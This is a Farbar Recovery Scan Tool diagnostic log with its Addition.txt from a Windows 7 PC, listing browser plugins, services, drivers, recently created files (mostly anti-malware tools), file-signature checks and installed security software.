Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: myrm - {4D034FC3-013F-4b95-B544-44D49ABE3E76} - C:\Program Files\McAfee\Managed VirusScan\Agent\myRmProt4.9.2.358.dll (McAfee, Inc.)
Handler: siteadvisor - {3A5DC592-7723-4EAA-9EE6-AF4222BCF879} - C:\Program Files\SiteAdvisor\6173\SiteAdv.dll ()
Tcpip\..\Interfaces\{47CED9F3-6727-4E66-BBD7-559438BB948D}: [NameServer] 167.206.245.130,167.206.245.129
 
FireFox:
========
FF Plugin: @Google.com/GoogleEarthPlugin -> C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @Microsoft.com/NpWinExt,version=5.0 -> C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\KELI\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF HKLM\...\Firefox\Extensions: [msntoolbar@msn.com] - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\Firefox
FF Extension: Bing Bar - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\Firefox [2010-10-16]
FF HKLM\...\Firefox\Extensions: [{27182e60-b5f3-411c-b545-b44205977502}] - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension
FF Extension: Search Helper Extension - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension [2010-10-16]
FF HKLM\...\Firefox\Extensions: [{3252b9ae-c69a-4eaf-9502-dc9c1f6c009e}] - C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DMExtension
FF Extension: Default Manager - C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DMExtension [2010-10-16]
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\38.0.2125.111\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files\Google\Chrome\Application\38.0.2125.111\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\38.0.2125.111\pdf.dll ()
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll No File
CHR Plugin: (Bing Bar) - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
CHR Plugin: (Silverlight Plug-In) - c:\Program Files\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
CHR Profile: C:\Users\KELI\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\KELI\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-07-18]
CHR Extension: (Google Wallet) - C:\Users\KELI\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-04-01]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 EngineServer; C:\Program Files\McAfee\Managed VirusScan\VScan\EngineServer.exe [14144 2009-06-02] (McAfee, Inc.)
S2 HP Support Assistant Service; C:\Program Files\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2013-11-04] (Hewlett-Packard Company) [File not signed]
S4 McShield; C:\Program Files\McAfee\Managed VirusScan\VScan\McShield.exe [144704 2009-06-02] (McAfee, Inc.)
S4 myAgtSvc; C:\Program Files\McAfee\Managed VirusScan\Agent\myAgtSvc.Exe [221024 2009-11-17] (McAfee, Inc.)
R2 pdfcDispatcher; C:\Program Files\PDF Complete\pdfsvc.exe [635416 2009-06-18] (PDF Complete Inc)
R2 SiteAdvisor Service; C:\Program Files\SiteAdvisor\6173\SAService.exe [341280 2010-10-16] ()
R2 UNS; C:\Program Files\Common Files\Intel\Privacy Icon\UNS\UNS.exe [2066968 2009-07-24] (Intel Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [114904 2014-10-27] (Malwarebytes Corporation)
S3 MfeAVFK; C:\Windows\System32\drivers\MfeAVFK.sys [79816 2009-05-15] (McAfee, Inc.)
S3 MfeBOPK; C:\Windows\System32\drivers\MfeBOPK.sys [35272 2009-05-15] (McAfee, Inc.)
R1 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [214024 2009-05-15] (McAfee, Inc.)
S3 MfeRKDK; C:\Windows\System32\drivers\MfeRKDK.sys [34248 2009-05-15] (McAfee, Inc.)
R1 mfetdik; C:\Windows\System32\drivers\mfetdik.sys [55336 2009-05-15] (McAfee, Inc.)
R3 vpcbus; C:\Windows\System32\DRIVERS\vpchbus.sys [172416 2010-11-20] (Microsoft Corporation)
R1 vpcnfltr; C:\Windows\System32\DRIVERS\vpcnfltr.sys [48128 2010-11-20] (Microsoft Corporation)
R3 vpcusb; C:\Windows\System32\DRIVERS\vpcusb.sys [78336 2010-11-20] (Microsoft Corporation)
R1 vpcvmm; C:\Windows\System32\drivers\vpcvmm.sys [296064 2010-11-20] (Microsoft Corporation)
S3 catchme; \??\C:\Users\KELI\AppData\Local\Temp\catchme.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-11-03 16:58 - 2014-11-03 16:58 - 02347384 _____ (ESET) C:\Users\KELI\Desktop\esetsmartinstaller_enu.exe
2014-11-03 16:58 - 2014-11-03 16:58 - 00000000 ____D () C:\Program Files\ESET
2014-10-30 08:18 - 2014-10-30 08:18 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Downloads\tdsskiller (2).exe
2014-10-30 08:18 - 2014-10-30 08:18 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Desktop\tdsskillerx.exe
2014-10-30 08:18 - 2014-10-28 08:24 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Desktop\tdsskiller.exe
2014-10-30 08:15 - 2014-11-06 08:38 - 00000000 ____D () C:\Users\KELI\Desktop\FRST-OlderVersion
2014-10-30 08:14 - 2014-10-30 08:14 - 00000619 _____ () C:\Users\KELI\Documents\fixlist.txt
2014-10-28 08:58 - 2014-10-28 08:58 - 00047174 _____ () C:\ComboFix.txt
2014-10-28 08:48 - 2014-10-28 08:58 - 00000000 ____D () C:\Qoobox
2014-10-28 08:48 - 2011-06-26 01:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-10-28 08:48 - 2010-11-07 12:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-10-28 08:48 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-10-28 08:48 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-10-28 08:48 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-10-28 08:48 - 2000-08-30 19:00 - 00098816 _____ () C:\Windows\sed.exe
2014-10-28 08:48 - 2000-08-30 19:00 - 00080412 _____ () C:\Windows\grep.exe
2014-10-28 08:48 - 2000-08-30 19:00 - 00068096 _____ () C:\Windows\zip.exe
2014-10-28 08:46 - 2014-10-28 08:48 - 01998336 _____ () C:\Users\KELI\Downloads\AdwCleaner.exe
2014-10-28 08:45 - 2014-10-28 08:44 - 05591695 ____R (Swearware) C:\Users\KELI\Desktop\ComboFix.exe
2014-10-28 08:43 - 2014-10-28 08:44 - 05591695 _____ (Swearware) C:\Users\KELI\Downloads\ComboFix.exe
2014-10-28 08:24 - 2014-10-28 08:24 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Downloads\tdsskiller (1).exe
2014-10-28 08:23 - 2014-10-28 08:24 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Downloads\tdsskiller.exe
2014-10-27 16:24 - 2014-10-27 16:24 - 00003189 _____ () C:\Users\KELI\Desktop\Sophos Virus Removal Tool.lnk
2014-10-27 16:24 - 2014-10-27 16:24 - 00000000 ____D () C:\Users\KELI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sophos
2014-10-27 16:24 - 2014-10-27 16:24 - 00000000 ____D () C:\ProgramData\Sophos
2014-10-27 16:24 - 2014-10-27 16:24 - 00000000 ____D () C:\Program Files\Sophos
2014-10-27 16:18 - 2014-10-27 16:19 - 00000000 ____D () C:\NPE
2014-10-27 15:54 - 2014-10-27 16:21 - 00000000 ____D () C:\Users\KELI\AppData\Local\NPE
2014-10-27 15:54 - 2014-10-27 15:54 - 00000000 ____D () C:\ProgramData\Norton
2014-10-27 15:53 - 2014-10-27 15:56 - 103020744 _____ (Sophos Limited) C:\Users\KELI\Downloads\Sophos Virus Removal Tool.exe
2014-10-27 15:52 - 2014-10-27 15:53 - 03060320 ____N (Symantec Corporation) C:\Users\KELI\Downloads\NPE.exe
2014-10-27 15:16 - 2014-10-28 08:45 - 00000000 ____D () C:\Windows\erdnt
2014-10-27 15:12 - 2014-10-30 08:19 - 00024724 _____ () C:\Users\KELI\Desktop\Addition.txt
2014-10-27 15:11 - 2014-11-06 08:44 - 00013121 _____ () C:\Users\KELI\Desktop\FRST.txt
2014-10-27 15:11 - 2014-11-06 08:44 - 00000000 ____D () C:\FRST
2014-10-27 15:10 - 2014-10-27 15:10 - 01706144 _____ (Thisisu) C:\Users\KELI\Downloads\JRT.exe
2014-10-27 15:10 - 2014-10-27 15:10 - 01706144 _____ (Thisisu) C:\Users\KELI\Downloads\JRT (1).exe
2014-10-27 15:07 - 2014-11-06 08:38 - 01106432 _____ (Farbar) C:\Users\KELI\Desktop\FRST.exe
2014-10-27 15:07 - 2014-10-27 15:07 - 01104896 _____ (Farbar) C:\Users\KELI\Downloads\FRST.exe
2014-10-27 14:28 - 2014-10-27 15:41 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-27 14:28 - 2014-10-27 14:29 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-27 14:28 - 2014-10-27 14:29 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-27 14:28 - 2014-10-27 14:28 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-27 14:28 - 2014-10-01 10:11 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-27 14:28 - 2014-10-01 10:11 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-27 14:28 - 2014-10-01 10:11 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-15 12:57 - 2014-10-09 20:44 - 00396288 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-15 12:57 - 2014-10-09 20:44 - 00230912 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-15 12:57 - 2014-10-09 20:39 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-15 12:57 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-15 12:57 - 2014-09-28 19:41 - 02379264 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-15 12:57 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-15 12:57 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-15 12:57 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-15 12:57 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-15 12:57 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-15 12:57 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-15 12:57 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-15 12:57 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-15 12:57 - 2014-09-18 20:14 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-15 12:57 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-15 12:57 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-15 12:57 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-15 12:57 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-15 12:57 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-15 12:57 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-15 12:57 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-15 12:57 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-15 12:57 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-15 12:57 - 2014-09-18 19:50 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-15 12:57 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-15 12:57 - 2014-09-18 19:44 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-15 12:57 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-15 12:57 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-15 12:57 - 2014-09-18 19:20 - 00677888 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-15 12:57 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-15 12:57 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-15 12:57 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-15 12:57 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-15 12:57 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-15 12:57 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-15 12:57 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-15 12:57 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-15 12:57 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-15 12:56 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-15 12:56 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-15 12:56 - 2014-08-18 21:41 - 00050688 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-15 12:56 - 2014-08-18 21:41 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-15 12:56 - 2014-08-18 21:41 - 00027648 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-15 12:56 - 2014-08-18 21:40 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2014-10-15 12:56 - 2014-08-18 21:40 - 00016896 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2014-10-15 12:56 - 2014-08-18 20:48 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-15 12:56 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-15 12:56 - 2014-07-16 20:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-15 12:56 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-15 12:56 - 2014-07-16 20:39 - 00523264 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-15 12:56 - 2014-07-16 20:39 - 00304128 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-15 12:56 - 2014-07-16 20:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll
2014-10-15 12:56 - 2014-07-16 20:39 - 00130048 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-15 12:56 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-15 12:56 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-15 12:56 - 2014-07-16 20:03 - 00184320 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-15 12:56 - 2014-07-16 20:02 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-15 12:56 - 2014-07-06 20:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00473600 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00275968 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00157184 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-15 12:56 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-15 12:56 - 2014-07-06 20:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-15 12:56 - 2014-07-06 20:39 - 03970488 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2014-10-15 12:56 - 2014-07-06 20:39 - 03914680 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-15 12:56 - 2014-07-06 20:39 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-15 12:56 - 2014-07-06 20:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-15 12:56 - 2014-07-06 20:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-15 12:56 - 2014-07-06 20:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-15 12:56 - 2014-07-06 20:28 - 00593920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-15 12:56 - 2014-06-27 19:21 - 00521384 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-15 12:56 - 2014-06-27 19:21 - 00455752 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-15 12:56 - 2014-06-27 19:21 - 00409272 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-11-06 08:43 - 2012-05-01 09:33 - 00000000 ___RD () C:\Users\KELI\Dropbox
2014-11-06 08:43 - 2012-05-01 09:32 - 00000000 ____D () C:\Users\KELI\AppData\Roaming\Dropbox
2014-11-06 08:42 - 2014-06-04 09:57 - 00000556 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3621039740-3434257137-3815352865-1001.job
2014-11-06 08:42 - 2011-03-21 10:19 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-11-06 08:42 - 2010-12-29 17:48 - 00075488 _____ () C:\Windows\PFRO.log
2014-11-06 08:42 - 2010-10-16 11:07 - 01861574 _____ () C:\Windows\WindowsUpdate.log
2014-11-06 08:42 - 2009-07-13 23:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-06 08:42 - 2009-07-13 23:39 - 00093631 _____ () C:\Windows\setupact.log
2014-11-06 08:42 - 2009-07-13 23:34 - 00021680 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-06 08:42 - 2009-07-13 23:34 - 00021680 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-05 16:54 - 2010-12-29 17:49 - 00000000 ____D () C:\Scans
2014-11-05 16:30 - 2011-03-21 10:19 - 00000886 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-11-05 16:16 - 2012-04-03 08:22 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-05 09:13 - 2009-07-25 07:54 - 00782510 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-05 09:09 - 2010-10-16 11:11 - 00000000 ____D () C:\ProgramData\PDFC
2014-11-04 09:28 - 2012-01-10 09:25 - 00000316 _____ () C:\Windows\Tasks\HPCeeScheduleForKELI.job
2014-10-30 13:11 - 2009-07-13 23:52 - 00000000 ____D () C:\Windows\system32\FxsTmp
2014-10-28 08:57 - 2009-07-13 21:04 - 00000215 _____ () C:\Windows\system.ini
2014-10-28 08:38 - 2012-08-29 08:07 - 00002131 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-28 06:35 - 2011-03-21 10:46 - 00229000 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-10-27 15:37 - 2009-07-13 21:37 - 00000000 ___RD () C:\Users\Public
2014-10-27 14:49 - 2014-06-04 09:56 - 00000000 ____D () C:\Users\KELI\AppData\Local\Citrix
2014-10-16 09:24 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\rescache
2014-10-16 08:58 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-10-16 08:27 - 2012-01-17 09:31 - 00000000 _____ () C:\Windows\system32\HP_ActiveX_Patch_NOT_DETECTED.txt
2014-10-16 08:27 - 2011-04-12 08:27 - 00000052 _____ () C:\Windows\system32\DOErrors.log
2014-10-16 08:13 - 2009-07-13 23:33 - 00401032 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-16 08:12 - 2014-05-06 15:59 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-15 15:55 - 2013-08-14 16:10 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-15 15:52 - 2011-03-21 08:13 - 100290944 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
 
Some content of TEMP:
====================
C:\Users\KELI\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpz1liyd.dll
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-11-05 11:22
 
==================== End Of Log ============================

ADDITION.TXT:

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 04-11-2014
Ran by KELI at 2014-11-06 08:44:56
Running from C:\Users\KELI\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: McAfee® Total Protection™ for Small Business (Disabled - Out of date) {86355677-4064-3EA7-ABB3-1B136EB04637}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee® Total Protection™ for Small Business (Disabled - Out of date) {3D54B793-665E-3129-9103-206115370C8A}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adobe AIR (HKLM\...\Adobe AIR) (Version: 2.6.0.19140 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader X (10.1.10) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.10 - Adobe Systems Incorporated)
